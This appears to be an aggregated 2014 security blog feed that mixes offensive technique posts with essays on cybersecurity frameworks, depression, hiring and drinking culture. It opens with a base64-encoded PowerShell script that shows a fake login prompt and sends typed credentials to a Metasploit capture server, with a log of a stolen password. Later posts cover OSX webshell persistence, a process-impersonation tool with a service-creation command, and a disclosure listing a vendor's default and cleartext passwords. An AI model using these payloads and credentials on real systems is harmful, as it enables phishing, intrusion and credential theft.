Tells powershell that the HTTP-Basic credentials to use are the ones typed in the popup box recently by the user.

$result = $wc.downloadstring('https://172.16.102.163');

And finally the request to HTTP-Basic capture module in metasploit, but you could have anything you want capture these creds.

cat power.txt | iconv --to-code UTF-16LE | base64

JABjAHIAZQBkACAAPQAgACQAaABvAHMAdAAuAHUAaQAuAHAAcgBvAG0AcAB0AGYAbwByAGMAcgBlAGQAZQBuAHQAaQBhAGwAKAAnAEYAYQBpAGwAZQBkACAAQQB1AHQAaABlAG4AdABpAGMAYQB0AGkAbwBuACcALAAnACcALABbAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBVAHMAZQByAEQAbwBtAGEAaQBuAE4AYQBtAGUAIAArACAAIgBcACIAIAArACAAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVQBzAGUAcgBOAGEAbQBlACwAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVQBzAGUAcgBEAG8AbQBhAGkAbgBOAGEAbQBlACkAOwAKAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AOwAKACQAdwBjACAAPQAgAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ADsACgAkAHcAYwAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACIAVQBzAGUAcgAtAEEAZwBlAG4AdAAiACwAIgBXAGcAZQB0AC8AMQAuADkAKwBjAHYAcwAtAHMAdABhAGIAbABlACAAKABSAGUAZAAgAEgAYQB0ACAAbQBvAGQAaQBmAGkAZQBkACkAIgApADsACgAkAHcAYwAuAFAAcgBvAHgAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEQAZQBmAGEAdQBsAHQAVwBlAGIAUAByAG8AeAB5ADsACgAkAHcAYwAuAFAAcgBvAHgAeQAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBDAHIAZQBkAGUAbgB0AGkAYQBsAEMAYQBjAGgAZQBdADoAOgBEAGUAZgBhAHUAbAB0AE4AZQB0AHcAbwByAGsAQwByAGUAZABlAG4AdABpAGEAbABzADsACgAkAHcAYwAuAGMAcgBlAGQAZQBuAHQAaQBhAGwAcwAgAD0AIABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAcwB5AHMAdABlAG0ALgBuAGUAdAAuAG4AZQB0AHcAbwByAGsAYwByAGUAZABlAG4AdABpAGEAbAAoACQAYwByAGUAZAAuAHUAcwBlAHIAbgBhAG0AZQAsACAAJABjAHIAZQBkAC4AZwBlAHQAbgBlAHQAdwBvAHIAawBjAHIAZQBkAGUAbgB0AGkAYQBsACgAKQAuAHAAYQBzAHMAdwBvAHIAZAAsACAAJwAnACkAOwAKACQAcgBlAHMAdQBsAHQAIAA9ACAAJAB3AGMALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwAxADcAMgAuADEANgAuADEAMAAyAC4AMQA2ADMAJwApADsACgA=

Then execute powershell -ep bypass -enc <the encoded text from above> and you get this:

root@wpad:~/metasploit-framework# ./msfconsole -Lq
msf > use auxiliary/server/capture/http_basic
msf auxiliary(http_basic) > show options

Module options (auxiliary/server/capture/http_basic):

Name Current Setting Required Description
---- --------------- -------- -----------
REALM Secure Site yes The authentication realm you'd like to present.
RedirectURL no The page to redirect users to after they enter basic auth creds
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 80 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is random)

msf auxiliary(http_basic) > set SSL true
SSL => true
msf auxiliary(http_basic) > set SRVPORT 443
SRVPORT => 443
msf auxiliary(http_basic) > set URIPATH /
URIPATH => /
msf auxiliary(http_basic) > run
[*] Auxiliary module execution completed
msf auxiliary(http_basic) >
[*] Listening on 0.0.0.0:443...
[*] Using URL: https://0.0.0.0:443/
[*] Local IP: https://172.16.102.163:443/
[*] Server started.
[*] 172.16.102.140 http_basic - Sending 401 to client 172.16.102.140
[+] 172.16.102.140 - Credential collected: "SITTINGDUCK\user:ASDqwe123" => /

Game over!

Business Quality Control as a Strategy to Manage Cybersecurity Risk

Sun, 14 Dec 2014 01:08:40 +0000

So, I’ve recently written up two separate pieces talking about Business Security, Frameworks, Cybersecurity. One is for , the other is for CForum (hey, I was the next highlighted blog post after Ron Gula’s!). Let me know what you think of them, they’re below. (Also, two posts more directly about the new NIST Framework and the DHS Voluntary Program are HERE and HERE)

SCOPING FRAMEWORK USE

Cybersecurity is, broadly, the enablement of an environment in which business objectives are sustainably achievable in the face of continuous risk resulting from the use of cyber systems.

The risks from using cyber systems usually take the form of actors desiring to use those systems as a means of repurposing business value chains to alter the value produced, inhibit the value produced, or producing new value in support of actor objectives.

Managing these risks involves two focus areas:

Creating a business environment which limits the window of opportunity provided to actors in which to achieve their objectives
Executing a security-specific program that is able to identify, mitigate, and respond to actor activity which is occurs within the remaining window of opportunity.

Leaving the business environment unmanaged provides a large continuous window of opportunity which is, at best, not cost effective for security-specific programs to effectively respond to. At worst, the window of opportunity created by an unmanaged business environment leaves the window of opportunity too wide for security-specific programs to protect, even with excessive financial investment.

On the other hand, no organization can manage its business environment and reduces actor opportunities sufficiently to remove the need for security-specific programs.

Both focus areas must be addressed for sustainable, effective, cost-limited cybersecurity and the NIST Framework can help with both.

Cybersecurity Frameworks, generically may provide business value to an organization in three ways:

Scope and Completeness Assessment
Coverage Validation
Efficacy Testing

In the case of security-specific programs, the NIST Framework can be used directly as a positive model for determining program scope and completeness, it can (using the tier model) be augmented with additional information to assist with security program coverage validation, and it can play a role within a larger model in testing efficacy of security program efforts.

Within the business environment focus area, the NIST Framework can also play a supporting role as a negative model to help determine areas which must be better controlled by the business before security-specific programs can effectively manage residual cybersecurity risk flowing down from that environment.

While XYZ is focusing specifically on the former, security-program specific, focus area, its resulting efforts can, with forethought, go a long way to providing a foundation for the less-well explored area of cybersecurity risk reduction through business environment management and lead us toward the kind of comprehensive cybersecurity risk management approaches that will, over time, reduce our risk across organizations, the sector, and the nation sustainably, cost effectively, and independent of increases in complexity and changes in actor behavior.

FRAMING THE FUTURE (From CForum)

What’s next?

This is a question on all of our minds – not just for the Framework but also cybersecurity more generally.

Executives have started to get on board, the press is paying attention, manufacturers are starting to include security in their ICS products, grass roots organizations such as I Am The Cavalry and others are forming to help to move Automotive and Medical Device security forward, the White House has issued the Executive Order, Congressional staff discusses cybersecurity regularly, and together we have created a common practice consensus “flag” with the NIST Framework, and this very forum now exists to help us collaborate more effectively.

So, how do we use this momentum to continue to move forward coherently toward sustained risk reduction?

I’ve heard a lot of good ideas here, at the 6^th NIST workshop, and in many other venues about what to do next, but a lot of these ideas, thrown up into the air, fall down with no structure to catch them. There is no bigger picture into which to slot next step ideas and see how they relate to past work, need, and each other.

Without such a common reference structure, making progress from here on out will be increasingly difficult and I believe we need to learn from the very recently successful past and build a framework to do so.

The new framework I’m envisioning would, far from a “2.0” of what we’ve already built, have a completely different goal. Instead of collecting and organizing common solution elements into a document, this framework would identify the types of problemswe face doing business in a hostile, ICT (Internet and Communication Technology) enabled world and provide a context in which to organize the existing NIST Framework solutions.

In other words, if we identify a common language and reference for the “cybersecurity problem space” – especially the areas outside of the CISO organization – it should be much easier to go back, find out where the Framework excels, where it needs help, and where it simply does not apply and, from there, allow us to organize future efforts effectively and sustainably.

Maybe we should have done this earlier, but maybe it took creating a Common Practice Framework to highlight the need to go back and create a “Problem Space Framework”. How many of us have looked at strategy documents that said things like “Will reduce cyber attacks” or “Improve Cybersecurity” and thought “But wait, what does that mean?” Shouldn’t there be goals, or non-security objectives for security to help frame, limit, and shape our efforts to some productive end?

When the executive order came out and I heard about how the NIST Framework was going to be used to support “Performance Objectives”, I thought, “Great! Finally, we’re going to have the electrical current that non-security-activity goals provide to security activities to drive them to defined, implementable, and effective ends”.

Unfortunately, that doesn’t seem to be happening and there doesn’t seem to be consensus that that was even the original intent. But that doesn’t mean we don’t still need to create that organizing current around security activities.

The “Tier” concept in the existing framework, as incomplete as it is, definitely speaks to the need for the application of a maturity model to what we’re doing, but even maturity models need to exist inside a larger context of “Why?” that is framed by all of the ways organizations – and those who work for them – introduce risk. If we don’t have a framework for risk introduction in a broad business and national context, how will we ever be able to tell ourselves, each other, our customers, or anyone else that we’ve applied the NIST Framework in some legitimately effective or helpful way?

This shouldn’t be a hard problem to solve. As with the Common Practices in the NIST Framework, we’re in a situation where a lot of different people have very different but valid views into the cybersecurity problem space. The material and knowledge exists, we just need to gather it, write it down, gain consensus, and begin to apply it.

From my own point of view, I think this begins by identifying (and documenting) how the major, common roles within organizations (and of organizations) introduce cybersecurity risk through legitimate, authorized means in the course of doing business. If we can nail this down across the entire business value chain – from Boards and CEO’s to CFO’s to Operations Managers to IT to Procurement to Sales and Marketing to HR to Industry Partners to Insurance Companies to Regulators all the way to the CISO shops that the NIST Framework already assumes solutions for – we will have a much better understanding of what we’re solving for. This is because our cybersecurity risk profiles are, when it comes down to real root causes, exclusively the result of the series of decisions made by people in legitimate, authorized capacities. Whether or not the decisions are in your sphere of influence, knowing how they are influencing your cybersecurity risk profile over time is the first step in determining how to most effectively apply the controls from the existing NIST Framework. From there, that knowledge can be applied to contextualizing the maturity levels in models like the ES-C2M2 in a way that provides “Management Metrics” to those responsible for managing organizational behavior, and those maturity levels can then guide the scope, goals, metrics, and placement of those controls that exist in the NIST Framework.

Beyond the tactical benefits of the knowledge such a framework would give us, our ability to act strategically will improve. If we know how our CEOs and those who work for them are introducing risk, if we can find commonalities across organizations, then we can describe the goals, effectiveness, and mitigating controls in terms that are much less dependent on far too rapidly changing technology and external threat actors. This would provide a much more stable platform over time from which to begin doing sustainably successful risk management, maturity modeling, and NIST Framework implementation and adoption.

That said, this is just one way we might go about creating a “Problem Space Framework” – there are others. Regardless of which one we choose, I strongly believe building one will clarify, speed up, and make our way forward much more effective at reducing risks created by the use and operation of ICT’s.

Filed under: Critical Infrastructure Protection, Executive Order/NIST Framework, Risk Management Theory Tagged: #NISTCSF, Business Security Architecture, Cyber Security, dhs, Effective Strategy, NIST Cybersecurity Framework, Real Strategy, risk management

Future of Security Products

Thu, 13 Nov 2014 13:58:00 +0000

Schneier recently used an extremely simplified version of OODA loop to explain how Incident Response fits into the ol’ Protect, Detect, Respond structure - and how products can be designed to fit into this structure to keep pushing out new technology (while pointing out it’s the people thinking that matters). In short, Schneier’s oversimplification has motivated me to rant on my inactive and lackluster site.

I won’t grow a neck beard and point out that OODA loop isn’t a serial process that he outlines. I won’t point out that OODA loops are not about speed of action above all else. I won’t point out that orientation is a key (the key?) in making the right decision. I will even do my best to not explain how OODA loops are only valuable when comparing them to an opponents- who is faster, who is better at making and acting on decisions, who can stall the others decision cycle to gain an advantage?

Instead, I will point out that the OODA loop does not fit into the Response phase of ‘Protect, Detect, Respond’. Sure, it can be used as a model on how to think about IR; but it can be used as a model on how you come to any conclusion in any portion of security; protection or detection phases are just as applicable because everything revolves around decisions at some point. Instead, if you zoom out and look at Protect <-> Detect <-> Respond you can see your security organizations OODA loop. If you explicitly build/use technology and brain power to understand what you are observing and how you are oriented then decisions through the entire security org (including response decisions) become fluid and have less resistance. Ever better OODA loops is what, in some ways, create the Red Queen effect that Schneier has referenced in the past.

Saying “Respond is the new black” is simply security companies figuring out what new product they can develop and position on the market. “Industry talk” masquerading as “security talk”. Which reminds me, I agree with Schneier about that whole lemon markets point he brought up in his post.

For your consideration, a security strategy vision:

Sun, 12 Oct 2014 19:03:44 +0000

“Maintain a positive relationship with the risk of oppositional forces acting against your interests that is agile in bringing appropriate resources to bear and independent of change, complexity, escalating pressure, technology, business strategy changes, and specific oppositional actions across all elements of your value chain while minimizing the involvement and role of dedicated security personnel and technology in achieving that relationship and emphasizing the role other business elements play in introducing and managing cyber risk. ” With maybe less awkward wording (it’s really bad), what do you think?

And, some (very incomplete) thoughts on problem spaces which need work to do the above successfully (possibly, problem spaces to be solved to derive tactics?):

Identify *specific* manners in which decision making across the organization defines (not just affects) security
Enhance ability to express coherent business-security policy through technology sustainably, effectively, efficiently
Limit knowledge, skill, time required to do all of the above
Integrate perspectives across national enterprise (i.e., soften/remove classic business boundaries)
Effectively link human and technological systems into a common system which can be spoken to by a common policy
Identify and measure indicators which provide visibility into non-security organizational behavior that results in desired security state independently of security-specific activities

Filed under: Critical Infrastructure Protection, Risk Management Theory Tagged: cyber security strategy statement

On Depression and Burnout...

Ben Tomhave — Tue, 16 Sep 2014 17:01:40 +0000

Preface: Screw the taboo, I'm gonna talk about this! Rarely, if ever, are we able to talk about "uncomfortable" topics like depression, but they're real, they're serious, and I would wager that if we would just talk about these things a little bit, then others who are going through (or have gone through) similar experiences might find some comfort.

There are few things that feel so good as returning to a normal life of happiness after suffering through a bout of depression. Thankfully, for me, such things are a rare occurrence, but I know that for some it's an ongoing struggle. The last time (prior to this Summer) that I dealt with depression was 2002 when I moved across country from Montana to Harrisburg, PA, leaving my wife behind because we couldn't afford to make a full move, seeing her once in ~5 months. Back then, it might have been the loneliness, the constant state of being broke, or maybe just general diet and exercise issues (or a combination of them all), but it was my first time dealing with depression, and it wasn't really until some months after emerging from that dark state that I even realized what it was I'd been going through.

This Summer marked a return to that dark place, and lemme tell ya, it was not enjoyable. Thank goodness for a tolerant and understanding wife and a handful of amazing friends who didn't give up on me and helped me find the light at the end of the tunnel. I don't know what it was that put me into the funk. I had returned home from 4 weeks on the road, 2 of which being spent on vacation with the family. I came back to an empty house, having left the wife+kids behind in Minnesota to visit with the extended family. I was absolutely dreading the 2nd week of that 2-wk period because I knew I wasn't going to be able to keep myself busy. I digress...

As I said, it's unclear what the trigger was... Was it the prospect of loneliness? Was it exhaustion from all the travel? Was it exhaustion as I recovered from pneumonia (diagnosed in late June)? Was it a result of no exercise and a complete breakdown in my diet? Was it work stress? Was it something else altogether? I'll never know for certain, but what I do know is this: It sucked, it was miserable, and it happens to more people than you might realize.

For those who don't perhaps know me all that well, I'm an extrovert. I thrive off being around people. I need socialization for my energy. I also try very hard to be a nice guy. I like joking with people, teasing people, and just generally trying to be fun and funny. While I'm not obsessed with being liked by everyone, I am cognizant of the emotional aura people project toward me, and - depending on the day - that may influence me one way or the other in terms of general happiness.

The point here, though, is that I'm not naturally a frump (despite what some might think after pointed email exchanges). I'm generally full of energy and try to push forward through concerns, challenges, etc, etc, etc. So, when I fell into the pit of despair, suffice to say that it swallowed me whole and threatened to keep me forever.

If you've not dealt with depression, then here's an idea of what it's like:

You have no energy whatsoever. Even the most minor/trivial of tasks (including eating and sleeping!) are exhausting and often seem insurmountable. Getting out of bed is nearly impossible. You want to sleep all the time. Yet, contrary to this feeling, you can't sleep, or at least your sleep is incredibly uneasy and non-restful/non-recuperating.

Everything is shit. If you've heard the phrase "viewing life through rose colored glasses," then shift that to being "through black-death-tinted glasses." All the positives in life? Gone/forgotten. Ever had fun? Can't recall. The job? It sucks. Life? It sucks. Friends? Meh. Family? Meh. You believe, truly and deeply, that your life has been a waste, that you're just taking up space+resources on this planet, and you just don't think you belong anywhere. (If you're not seeing where this line of thinking potentially goes, then you're not trying hard enough.)

Everything is a failure. Related to the last point, but noteworthy... nothing you do is good/successful/worthwhile. Reaching out to friends? Fail. At best, they tolerate you, and at worst they hate you. Trying to relate to family? You're misunderstood and unloved. Trying to do your job? You suck and are on the verge of being fired. Note that this all applies to perceptions and not to reality. Perception is so much more important and powerful than reality... as we see time and time again with depression, politics, and mass marketing...

The key points to all of this is that the harsh, dark feelings are very, very, very real to the person experiencing them, no matter what reality may actually be. And, no matter what you (as friend or family) say, there's really no changing these feelings, which can be /incredibly/ frustrating for friends and family. For more on what it's like being depressed, see this excellent article on Huffington Post, "9 Things Only People With Depression Can Truly Understand," which perfectly captures some of the feelings and challenges associated with depression.

Soooo... how did I finally snap out of it? Honestly, I don't know for certain, but I have a few ideas...

First and foremost, my wife and close friends continued to provide support throughout the episode without deriding me.

Second, I got my diet and exercise back on track (this was hugely important with the 2002 episode as well).

Third, work-related stress abated (a little bit, anyway). In part, this came from a former manager telling me "Ben, you're a good analyst." Just being told this phrase (backed by performance numbers) did a world of good as up to this point I'd felt like I was failing completely. I also finally broke-through on a project that had been plaguing me the entire time, though the breakthrough could arguably be linked to my recovery, too.

Fourth, better quality sleep returned. I think this relates significantly to diet and exercise.

Fifth, my T levels bounced back dramatically (see this article about the impact of low T in men, often contributing to depression). This may seem like a trivial thing, but it plays heavily into energy levels, at least for men.

Breaking free from the funk is a wonderful feeling. Sure, it hasn't been all sunshine and puppy dogs since the initially breakthrough, but for the most part things have been fine. There are still down days, and I feel very vulnerable to getting tipped back into the pit of despair (as nearly happened on Sunday/Monday after receiving a rude email at work). But, for the most part... things are better.

It's really a hard sensation to describe. I quite literally feel like a switch flipped and overnight I went from dark depression to elation (which, in itself, is a dangerous shift, since extremes can swing both directions). My goal is to get onto and stay with my diet and exercise, and to work diligently to find the positives in life. And, to quote Dylan Thomas, I hope to rage against the dying of the light... to push forward toward those positives that make my life good, and try to steer clear of those things that detract from that goal.

Do not go gentle into that good night,
Old age should burn and rave at close of day;
Rage, rage against the dying of the light.

"Do not go gentle into that good night"

Dylan Thomas, 1914 - 1953

Full Disclosure - SingleClick Connect

Rob Fuller — Mon, 15 Sep 2014 20:00:00 +0000

Update:

I originally posted this to the Full Disclosure mailing list but for some reason it wasn’t accepted via the moderator so I’m posting it here. First, so that the information does get out there, and second to see if anyone knows why it may have been rejected.

I was helping out a family member with their computer when it came up that they “already had remote help software” (SingleClickConnect or SCC), when I asked what this was, the family member said it was installed by Dell Support when trying to fix their issue. This was in 2008. I removed it, and helped to fix the issue.

In 2010 another issue arose on the new computer (Dell again) of the same family member. Again, calling support first they had installed this software.

Disclaimer: I can not say for certain that it was Dell’s support rep, or even that it was them that installed it, but if Dell is using this as a means of support they should probably cease for the following reasons: Apache (port 40080) listening 0.0.0.0, MySQL (port 17771) listening 127.0.0.1, PHP, and UltraVNC (5900) are installed as a part of the software package.

ISSUE #1

Without decoding the ionCube “copyright protecting” software a large number of XSS, CSRF, and SQLi vulnerabilities were found, all unauthenticated to the web app that runs there.

No specifics are being posted on these vulnerabilities as I assume the site on the net (company’s site), where a registered user would log in are the same as the ones locally hosted (at least the app looks the same and has similar page structure)

ISSUE #2

MySQL’s root password is blank and there are two other default accounts as well allowing easy privilege escalation to SYSTEM (via the SCC local account – see ISSUE #5):

dsl *7E1CA3417E3A159A9188657F44C7034A8E9FDFF2
tera *B2744A6BC5E8B1667BE5AED0111A2B941356E4A4

^ uncracked at this point. For all I know they could be randomized at install

ISSUE #3

Another service listens on 0.0.0.0 via port 17667 that I haven’t been able to identify, however when you connect to the socket, it starts listing users, services, printers and interfaces (and that is without sending any data to it).

$ ncat 172.16.102.149 17667
8�TXPBASELINEXP_BASEP�RAdministratorGuestHelpAssistantSingleClick
AdminSUPPORT_388945a0!aCACAMD PCNET Family PCI Ethernet Adapter -
Packet Scheduler Miniport{47F69AAC-AE9A-40A9-88F5-A246A169CE92}�f�
)�n��f�f��fDownloadsC:\Documents and Settings\Administrator\My
Documents\DownloadsMicrosoft XPS Document
WriterXPSPortprinter#:2TPVM#:1TPVMACDWindows FirewallMicrosoftCreative
Sound Blaster PCI

ISSUE #4

When UltraVNC is installed, it uses the same password as the one for your ‘registered’ account (just password auth) and listens on 0.0.0.0. It is easily to decrypt from the UltraVNC.ini that is located in %ApplicationData% for the user

ISSUE #5

A local account called “SingleClick Admin” is installed with a static password and added to the Administrators group. 3 services are also installed with the SingleClick Admin account as the user it runs under:

Package d'authentification : NTLM
Utilisateur principal : SingleClick Admin
msv1_0 : lm{ 7a9793d3082ba83b790ce07b3bdf85ea }, ntlm{ 2c292724d67fcf310d1c4dd153467be8 }
kerberos : ~!3no1972!~
ssp :
wdigest : ~!3no1972!~

8. Name : _SC_Apache2.2
8. Service : .\SingleClick Admin
8. Current : ~!3no1972!~

9. Name : _SC_dsl-fs-sync
9. Service : .\SingleClick Admin
9. Current : ~!3no1972!~
9. Old : ~!3no1972!~

10. Name : _SC_hnmsvc
10. Service : .\SingleClick Admin
10. Current : ~!3no1972!~

CONCERN #1

As far as I can tell the software continuously scans you local network for other computers and file system for changes and reports these back to the central server so that when you login to their service you can see your files and connect to other systems in the LAN of the machine SingleClickConnect is installed on.

CONCERN #2

The user account password that you use to register and connect remotely is stored in the database. This actually looks decently done, or I just haven’t been able to identify the storage

Database: p2p
Table: config_info
Value: “user_hash”

CONCERN #3

Not sure what this registry key contains other than being named Cred4RA and assuming it’s credentials for the remote administration. Hopefully encrypted some how.

[HKEY_LOCAL_MACHINE\SOFTWARE\SingleClick Systems\Advanced Networking
Service\Settings\Remote Access]
"ConfigState"=dword:00000001
"Cred4RA"=hex:01,00,00 (snip snip)

Additional Information

Software original site: http://www.singleclickconnect.com/
Current site: http://www.vivedriveconnect.com/
Direct download of software (for home use): http://downloads.vivedriveconnect.com/scc_setup.exe

Vendor Contact

Email sent in 2010 July about issues 1 – 5

No reply, and forgot about until 2013 when the software was mentioned by a friend (if I had ever heard of it)

2013 April – Email sent again, forwarding original, bounced back as account unknown
2014 August – Accidentally found notes while searching for something else, attempted to relocate the software via Archive.org with the feeling that the site had gone away and happened upon the new site,, downloaded software, confirmed issues, and forwarded the email to the new point of contact at the new domain. No response.
2014 September, Full disclosure.
Dell… If your techs do actually use this software for support (I hope not) in any form or fashion, you are putting each one of them at a pretty high risk.

OSX Persistence via PHP Webshell

Rob Fuller — Tue, 09 Sep 2014 19:40:00 +0000

As I learn more and more about OSX I find things that surprise me. For instance, in this post I will be showing you how to, with root or sudo privilege, enable the built-in apache server on OSX and it’s PHP module….

I am working with OSX Mavericks so your locations may vary based on the version of OSX your target it.

First things first is to enable the PHP module for the Apache server.

sudo nano -w /etc/apache2/httpd.conf

(vi or emacs to your heart’s content). But what we are looking for is to uncomment the following line:

#LoadModule php5_module libexec/apache2/libphp5.so

Once you do that, start up Apache. This can be done temporarily (won’t survive a reboot) with the apachectl command:

sudo apachectl start

Or you can make it more permanent with launchctl:

sudo launchctl load -w /System/Library/LaunchDaemons/org.apache.httpd.plist

And undoing the damage with:

sudo launchctl unload -w /System/Library/LaunchDaemons/org.apache.httpd.plist

After that, just drop your favorite PHP shell into the /Library/WebServer/Documents/ directory and you’re done. (My favorites are b374k and PHP Meterpreter).

Milkman: Creating Processes as Any Currently Logged in User

Rob Fuller — Thu, 14 Aug 2014 19:50:00 +0000

One of the problems with using PSEXEC from Metasploit (any of the psexec modules) is that it runs as SYSTEM. What’s the problem with that? Isn’t SYSTEM god mode? Ya, and normally I’d agree that it’s the best level to have, but the defenses these days have gotten better, and getting direct connections out is pretty rare. That leaves proxies, and as you know SYSTEM doesn’t get any proxy settings.

Here is a blog post that I made about setting the proxies for SYSTEM but leaving settings like this set is not only sloppy but hard to clean up.

Along comes RunAsCurrentUser-2.0.3.1.exe I found this gem by messing up a search on google for RunAsUser. Found it on this IBM support post.

Link to direct download:
http://software.bigfix.com/download/bes/util/RunAsCurrentUser-2.0.3.1.exe

Here is a mirror uploaded to my Post Exploitation repo:
https://github.com/mubix/post-exploitation/blob/master/win32bins/RunAsCurrentUser-2.0.3.1.exe

This binary takes a path to another executable as an argument. It then finds the currently logged in user and starts the provided executable as that user. AWESOME! This basically solves the whole PSEXEC->SYSTEM no-proxy settings issue. And it’s created by a legitimate company for legitimate reasons? w00tw00t. Game on!

Only two problems:

It is 335K, which doesn’t seem like much but over high latency lines that can take an eternity to transfer, especially over doubly encrypted channels like with a reverse_https meterpreter session.
It takes an argument which normally isn’t a huge challenge, but in our specific use case, psexec modules in Metasploit, it isn’t something we can do easily. You would have to upload your C2 binary, as well as the 335K RunAsCurrentUser over to the target host, then run the psexec_command module to execute them both, one as the argument of the other. Kinda sloppy.

So I set to try and figure out how this binary did it’s magic. As I’m not much of a reverse engineer I uploaded it to VirusTotal so I could take a look at it’s insides (plus, double check to see if it was being detected as malicious at all).

As far as I can tell the important pieces are the Windows API calls ImpersonateLoggedOnUser, and CreateProcessAsUserA. I set to trying to reproduce what it did in AutoIT (awesome stuff if you have never checked it out). I couldn’t quite get the API calls right, so I decided to give C++ a shot. Turned out to be pretty simple. I present to you “Milkman”:

https://gist.github.com/mubix/5d0cacdabfe092922fa3 (full source included below)

This program (once compiled) takes one argument (or none at all) and runs calc.exe for every instance of the process you tell it to. If you run it without arguments it auto selects explorer.exe. So if you create a service:

C:\temp\>sc create SuperService binpath= C:\Temp\milkman.exe type= own start= auto
[SC] CreateService SUCCESS

It will start up every time the computer starts, which is completely useless, since there won’t be any users logged in at that point, but you get where this can go. Features to add to this at point are:

Create a service binary that responds to START/STOP/PAUSE commands and such so that running this as a persistence method would actually be useful.
Add a loop so that it continues to run checking for explorer.exe every so often so it can catch when someone is logged in.
Finally the obvious one is to change it from being calc.exe that it runs by accepting another argument or some other kind of config option.

Thoughts? What would you like Milkman to do, or what use case do you think a tweak would make it work better for? Leave a comment below.

Job Opportunity: Secure Mentem

Ben Tomhave — Sun, 03 Aug 2014 22:00:16 +0000

Hey folks! Secure Mentem is hiring! If you have any interest in working in a top-notch org doing security awareness as a service, then this is it! Details below:

Secure Mentem is looking for skilled security awareness practitioners to help serve our growing customer base from the Fortune 500 and beyond. The people will be expected to implement our patent-pending methodology of creating awareness programs, and providing the required level of support in implementing and maintaining the resulting programs.

You will use our proprietary assessment tools to determine the organizational culture and business driver, and then working with our team, design the customized program. Should there be a security awareness manager (SAM) in place, you will work to make that person look brilliant. If there is no SAM, then you will provide the defined level of support to help implement and maintain the program. You may also be called on to help clients with independent awareness efforts such as program design, implementation, internationalization, metrics, phishing program implementation, creating and/or staffing events, social engineering, content development, and other tasks associated with security awareness programs. Experience in multiple organizations and multiple industry sectors preferred.

Secure Mentem focuses on the human aspects of security. We pride ourselves on providing comprehensive security awareness solutions that are tailored to our clients' culture and the organization.

To apply, please send your resume, with a cover letter, to Samantha@securementem.com.

The Internets Own Boy

Rob Fuller — Thu, 10 Jul 2014 21:49:00 +0000

Anyone who knows me knows that I live in a tiny world of offensive security, so much so that I miss large world events entirely. (Like elections and hurricanes)

I didn’t know Aaron Swartz, or even 1% of what he was doing in the world to make it a better place and for that I am ashamed. I will do better, to look around, see what needs to be changed in this world and make it a reality.

The following is a Documentary about the life of Aaron Swartz. If you live under a similar rock as I, you can start here: http://en.wikipedia.org/wiki/Aaron_Swartz

Watch, learn, share, and help continue a legacy that Aaron started.

Why Good Leaders Make You Feel Safe

Rob Fuller — Tue, 27 May 2014 21:51:00 +0000

This talk really touched home with me and I wanted to share it, and not just because he talked about Marines. ;–)

Forward this talk on to your fellow employees, boss, etc.

Go Home InfoSec, You're Drunk

Rob Fuller — Mon, 26 May 2014 22:03:00 +0000

Let me start off by saying this post is easy for me to write in one facet as I’ve never been a heavy drinker or much enjoyed the taste of alcohol. So if you need a reason to disregard what I say next, I leave the door open.

I am still pretty much a runt in the infosec community as I didn’t even begin learning computers (outside of playing games on them) until 2005. However, one thing that has nagged at me for a long time is the intertwined nature of hacking/infosec and drinking. Its almost a right of passage in the common fraternity style. The problem lies in the fact that you don’t really “graduate” and leave those parties behind.

Now, I have certainly partaken in my share of parties and consumption, even with that nagging feeling in the back of my head. It didn’t really take root until just recently. I was at a conference where a student (who was not 21) that looked very much like an older version of my oldest child said that he was going to skip dinner to go get wasted with XYZ “Infosec Rockstar”.

That scared me into thinking that if my son goes into Infosec he will be basically expected to drink like an alcoholic. How can I want my kid to be expected (not forced) to drink a shot on stage if he gets accepted to speak at DEF CON.

We (the infosec community) are few, and we lose too many to idiotic things like drug overdose, drinking and driving, and other stupidly preventable crap. For that reason I actually don’t want to share the thing I feel so passionate about with my own kids.

My call to action is this:

If you are a conference goer, try going one con completely dry, and if you already do, maybe ask friend to join you.

If you are speaker, enough of the drinks on stage and drinking games. Do you really want the next generation, those you are trying to teach, to remember that part of your talk instead of the rest?

If you are a conference organizer, maybe a completely dry day at the con? or an AA meeting space?

If you are a podcaster, if you drink during the cast, make it about the taste and selection, instead of how wasted and totally useless the next hour of your listeners life will be.

ShmooCon runs an AA meeting at the con

Lets stop losing our friends and family because we are too weak to say ‘no thank you’ when someone approaches the dais with a shot.

Installing PyCrypto on OSX Mavericks

Rob Fuller — Wed, 21 May 2014 22:27:00 +0000

Keeping it here for notes and just in case anyone else runs into this same issue.

brew install pip
sudo ARCHFLAGS=-Wno-error=unused-command-line-argument-hard-error-in-future pip install pycrypto

If you have a better way please leave a comment below!

Effective NTLM / SMB Relaying

Rob Fuller — Wed, 21 May 2014 22:13:00 +0000

SMB Relay has been around for a long while. I even have a post about using it along with LNK files here: MS08-068 + MS10-046 = Fun until 2018

Here is the problem though. Most of the tools to exploit it either catch the authentication in NTLMv2/NTLMv1 (which is not always easy to crack) or assume administrative access (because they attempt to PSEXEC with the incoming session). Well, since MS08-068 thats much harder to pin down. You have to know who is going to hit your relay server and what other location they might be an admin on. You also have to a service you want to run on that target.
Current Tools:

“Soft” relay tools:

